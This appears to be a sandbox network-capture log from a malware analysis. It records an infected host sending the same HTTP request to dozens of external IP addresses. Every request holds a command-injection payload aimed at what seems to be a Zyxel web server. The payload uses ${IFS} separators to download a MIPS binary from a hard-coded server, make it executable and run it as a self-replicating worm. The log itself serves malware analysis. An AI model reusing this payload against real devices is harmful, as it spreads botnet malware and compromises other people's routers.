                                                  Jan 19, 2024 18:24:14.425569057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8972192.168.2.1350464144.75.195.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425587893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8973192.168.2.1350100138.183.25.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425631046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8974192.168.2.133302075.170.191.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425682068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8975192.168.2.1358930128.165.11.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425725937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8976192.168.2.1346058206.82.231.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425761938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8977192.168.2.135739892.31.179.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425791025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8978192.168.2.1345164138.150.193.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425851107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8979192.168.2.1356406133.236.16.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425854921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8980192.168.2.135376431.171.83.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425911903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8981192.168.2.134354694.187.230.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425956964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8982192.168.2.1333584119.71.45.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425988913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8983192.168.2.1341786103.162.191.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426023960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8984192.168.2.135229690.186.206.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426048994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8985192.168.2.1351042223.109.120.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426074982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8986192.168.2.135529264.106.180.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426124096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8987192.168.2.1347534132.241.186.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426160097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8988192.168.2.1333590197.203.224.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426203966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8989192.168.2.1349272178.165.191.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426237106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8990192.168.2.1350056112.224.39.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426258087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8991192.168.2.1348754169.114.202.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426325083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8992192.168.2.134505079.161.163.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426373959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8993192.168.2.1360786174.184.8.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426409006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8994192.168.2.133531638.142.81.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426465034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8995192.168.2.133390079.136.178.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426492929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8996192.168.2.1339474206.64.57.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426537037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8997192.168.2.135984847.118.113.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426589966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8998192.168.2.1344470148.204.92.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426620960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8999192.168.2.135480094.156.51.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426651001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9000192.168.2.1359436118.155.208.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426696062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9001192.168.2.134648658.110.182.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426733017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9002192.168.2.1348926117.208.248.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426800966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9003192.168.2.1335576151.120.76.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426862001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9004192.168.2.1357198163.167.161.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426883936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9005192.168.2.1352104180.230.168.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426934004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9006192.168.2.133373819.4.43.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.426964045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9007192.168.2.1338242165.18.251.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427011967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9008192.168.2.133871418.7.208.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427057981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9009192.168.2.134357886.146.19.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427118063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9010192.168.2.1357720119.60.241.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427124023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9011192.168.2.1338518196.250.222.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427156925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9012192.168.2.134997872.31.147.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427206039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9013192.168.2.1359948136.211.98.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427264929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9014192.168.2.1340680123.137.166.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427292109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9015192.168.2.1349914220.180.14.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427326918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9016192.168.2.1353828115.232.106.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427382946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9017192.168.2.1353436131.244.96.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427423954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9018192.168.2.1357334130.108.39.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427460909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9019192.168.2.135448885.176.207.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427510023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9020192.168.2.1341158220.187.10.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427556992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9021192.168.2.1351352112.201.90.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427588940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9022192.168.2.1337998206.206.74.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427640915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9023192.168.2.133981884.189.137.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427673101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9024192.168.2.133938473.146.201.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427722931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9025192.168.2.135592483.43.32.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427747011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9026192.168.2.1337260208.204.175.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427781105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9027192.168.2.1350146114.187.158.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427840948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9028192.168.2.1341444188.180.208.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427867889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9029192.168.2.134072012.190.119.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427925110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9030192.168.2.135942045.144.220.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.427967072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9031192.168.2.133926878.203.118.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428024054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9032192.168.2.1358314218.188.10.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428065062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9033192.168.2.135388668.158.186.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.428092003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9034192.168.2.134941638.48.23.62443
                                                  TimestampBytes transferredDirectionData
